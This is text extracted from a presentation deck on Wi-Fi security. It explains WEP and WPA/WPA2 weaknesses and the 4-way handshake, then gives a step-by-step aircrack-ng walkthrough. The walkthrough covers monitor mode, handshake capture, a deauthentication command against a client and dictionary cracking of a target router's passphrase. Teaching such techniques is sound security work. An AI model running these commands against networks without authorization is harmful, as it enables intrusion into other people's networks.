You are on page 1of 51

Wireless Security

About me : Nilesh Sapariya


CEH v8 , CCNA
Security Engineer
Agenda
1) Introduction to WLAN Security

2) WLAN Architectures

3) WPA / WPA2 PSK (Personal) Cracking


WLAN
1 ) In computing, Wireless LAN or Wireless Local Area
Network is a term to refer to a Local Area Network that
does not need cables to connect the different devices.

2) Instead, radio wave are used to communicate


From Fixed Device to Mobile Device
These Devices dont have LAN Port
Only and Best Mode of Connectivity
With Wi-Fi Ports Can Be Easily Cut In Half
Representative 12-person Workgroup
V 12 VOIP phones C 6 Conference room & public area ports
D 7 Desktop PCs O 5 Other devices (printer, copier, fax, etc.)
L 5 Laptop PCs F 12 Ports (reserved for future use)
AP 1 Wireless AP (mobile devices, guests, etc.)

Existing Wired Network Edge (1:1 ratio of ports to devices)

D D D D O O V V V V V V L L L L L F F F F F F
AP
D D D O O O V V V V V V C C C C C C F F F F F F

Right-sized Edge (One port supports multiple users and devices simultaneously)

D D D D O O V V V V V V AP
D D D O O O V V V V V V

Wireless is a more efficient, many-to-one access method


7
Security Risk

Uncontrolled Wireless Devices


Rogue APs
Laptops acting as bridges
Misconfigured WLAN Settings on laptops
Ad-Hoc networks

Attacks against WLAN infrastructure


Denial of Service/flooding
Man-in-the-Middle
WEP (Wired Equivalent Privacy ) cracking (aircrack-ng
famous tool)
WPA/WPA2 ( Wireless protected access ) cracking
(aircrack-ng famous tool)
Security Risk

Office

Rogue User

Server

Mis-configured Access
Point

Ad Hoc
Access Point MAC
Spoofing

And More such kind of Attacks


Wireless Standards - 802.11a, 802.11b/g/n, and 802.11ac

1997 IEEE ( Institute of Electrical and


Electronics Engineering ) created First WLAN
Called as 802.11
802.11 only supports max network BW = 2
Mbps (to slow for most of application )
WLAN Operation
Wireless LAN (WLAN) Can operate in 2
different frequency ranges
2.4GHz (802.11 b/g/n )
4.9 or 5GHz (802.11 a/h/j/n)
Note : your wireless card can only be on one
channel ( it has single radio )
Every country has allowed channel ,users and
maximum power levels
Fair distribution of clients
Channel 1
across channels
Channel 6
eg. Channel 1, 6, 11
Channel 11

Fair distribution of clients


across bands
eg. 2.4-GHz and 5-GHz
WLAN Setup
Centralized
Fat Access Point
Mobility
Controller
Management
Policy
Management Mobility
Policy Forwarding
Mobility Encryption
Forwarding Authentication
Encryption
Authentication
802.11a/b/g/n Thin Access Points
Antennas 802.11a/b/g/n
Antennas

Many devices to manage Centralized Management


Many entry points to secure Centralized Security
Wardriving
How to find SSID in your area
How to find hidden SSID
Tools used :-
i. inSSIDer
ii. Common view for wifi
Understanding WPA / WPA2
(Wi-Fi Protected Access )
Wireless Encryption

The main source of vulnerability associated


with wireless networks are the methods of
encryption. There are a few different type
of wireless encryption including:

WEP
WPA
WPA2
WEP
Stands for Wired Equivalent Privacy.
WEP is recognizable by the key of 10 or
26 hexadecimal digits.
WPA or WPA2
Stands for Wi-Fi Protected Access
Created to provide stronger security
Still able to be cracked if a short password is
used.
If a long passphrase or password is used,
these protocol are virtually not crackable.
WPA-PSK and TKIP or AES use a Pre-Shared
Key (PSK) that is more than 7 and less than 64
characters in length.
Why WPA ?

WEP (Wired Equivalent Privacy )broken


beyond repair

if you are using 64 bit or 128 bit key WEP will be broken
Weaknesses of WEP
1. Poor key management

WEP uses same key for authentication/encryption


Provides no mechanism for session key
refreshing
Static Key encryption used

2. One-way authentication
WEP Replacement

WPA WPA2
Intermediate solution by Wifi- Long Term Solution
Alliance Use CCMP ( Counter Mode Cipher
Use TKIP (Temporal Key Integrity Block Chaining Message
Protocol ) Authentication Code Protocol )
Based on WEP Based on AES
Hardware change not required Hardware Change Require
Firmware update

Personal Enterprise Personal Enterprise

PSK 802.1x + Radius PSK 802.1x + Radius


Difference between WPA-
Personal & WPA-Enterprise

Wireless Architecture
How to create profile for WPA-
Personal and WPA-Enterprise
WEP :Static Key Encryption
Probe Request-Response

Authentication RR , Association RR
Static Static
WEP Key WEP Key

Data Encrypted with Key


WPA :Non Static Key
Probe request response

Authentication , Association
Static Static
WEP Key WEP Key

Dynamic Key Generated First

Data Encrypted with Dynamic Key

How are dynamic keys Created ?


WPA / WPA2 PSK(Personal) Cracking
WPA Pre-shared Key

Pre-Shared Key 256 bit Pre-Shared Key 256 bit

PBKDF2

PBKDF2 Passphrase (8-63 )

Passphrase (8-63 )
PBKDF2
Password Based Key Derivation Function
RFC 2898
PBKDF2 (Passphrase, SSID,ssidLen,4096,256 )
4096 - Number of times the passphrase is
hashed
256 - Intended Key Length of PSK
How does the Client know ?
Beacon Frames ?
Probe Response Packets from the AP ?
Can be used to create a WPA/WPA2 Honeypot
as well!
How WEP Works
1) We try to collect large number of data
packets
2) Bunch of large data packet contains weak IV
3) We Run it with the algorithm or aircrak-ng
and get the key

Then how to crack WPA-PSK ?


Lets Shake the hand #4-way Handshake
Probe Request Response
Supplicant Authenticator
Authentication RR, Association RR

Pre-Shared Key 256 bit Pre-Shared Key 256 bit

ANounce
SNounce

PTK PTK
Message 2
Snounce + MIC

Key Installed

Message 4
Key Install Acknowledgement Key Installed
Pairwise Transient Key
PTK = Function (PTK ,ANounce, SNounce,
Authenticator MAC ,Supplicant MAC )

PMK= Pre-Shared Key (Pairwise master Key)


ANounce = Random by AP
SNounce = Random by Client
Authentication MAC = AP MAC
Supplicant MAC = Client MAC
MIC Message Integrity Check ( Signature
Algorithm )
WPA Working: Block Diagram
4 Way Handshake

Pre-Shared Key 256 bit


SNonce
Anonce
AP MAC
Client MAC
PBKDF2

Passphrase (8-63 )

PTK
WPA-PSK Susceptible to Dictionary
Attack
DEMO

WPA / WPA2 PSK(Personal) Cracking


External Wireless Card
Alfa Networks AWUS036H
USB based card
Already integrated with
Backtrack and Kali
Allows for packet sniffing
Allows for packet injection
We will use this in our
Demo session
Software Setup

Run Kali Linux on VM machine


Connecting Alfa Adapter
Understanding Wireless Sniffing
Wireless : Monitor mode
When you put card in monitor mode then it will
accept all the packet it is seeing in the current
channel
Inbuilt tool in Kali which helps in quickly put card
into monitoring mode and sniff the packets
Will use Tool name : airmon-ng to put card in to
monitor mode ( part of aircrack sweet of tools )
Some Basic Terms
MAC address or physical address is a unique
identifier assigned to network interfaces for
communications

Access point >> Wireless router

SSID (service set identifier) >> Network Name

BSSID (basic service set identification ) >> MAC


address of the access point
Using KaliLinux or BT
Some Basic Backtrack Terms >>
Wlan0 wireless interface
Mon0 monitor mode
Handshake :-refers to the negotiation process
between the computer and a WiFi server using WPA
encryption.
Needed to crack WPA/WPA2.
Dictionary - consisting the list of common
passowords.
.cap file used to store packets.
Tools Used
Airmon-ng >> Placing different cards in monitor
mode
Airodump-ng (Packet snniffer ) >> Tool used to listen
to wireless routers in the area.
Aireplay-ng ( Packet injector ) >> Aireplay-ng is used
to inject frames.
The primary function is to generate traffic for the
later use in aircrack-ng for cracking the WEP and
WPA-PSK keys.
Aircrack-ng >> Cracks WEP and WPA (Dictionary
attack) keys.
Lets Hack
Lets Start
This will list all of the wireless
cards that support monitor (not
injection) mode.

The (monitor mode enabled)


message means that the card has
successfully been put into monitor
mode. Note the name of the new
monitor interface, mine is mon0.
Airodump will now list
all of the wireless
networks in your area.
airodump-ng c [channel]
bssid [bssid] w
/root/Desktop/ [monitor
interface]
Replace [channel] with the
channel of your target
network. Paste the network
BSSID where [bssid] is, and
replace [monitor interface]
with the name of your
monitor-enabled interface,
(mon0).
Airodump with now monitor
only the target network,
allowing us to capture more
specific information about it.

NOTE :
What were really doing now is
waiting for a device to connect
or reconnect to the network,
forcing the router to send out
the four-way handshake that
we need to capture in order to
crack the password.
aireplay-ng 0 2 a [router bssid] c [client bssid] mon0
Upon hitting Enter, youll see aireplay-ng send the packets, and within
moments, you should see this message appear on the airodump-ng screen!
Final Step
aircrack-ng -a2 -b [router bssid] -w [path to wordlist]
/root/Desktop/*.cap
-a is the method aircrack will use to crack the
handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the
BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with
the path to a wordlist that you have downloaded. I
have a wordlist called wpa.txt in the root folder.
/root/Desktop/*.cap is the path to the .cap file
containing the password
If the phrase is in the wordlist, then aircrack-ng will
show it too you like this
Thank you

Email: nilesh.s.sapariya@gmail.com
Twitter : @nilesh_loganx
Contact : 8898813662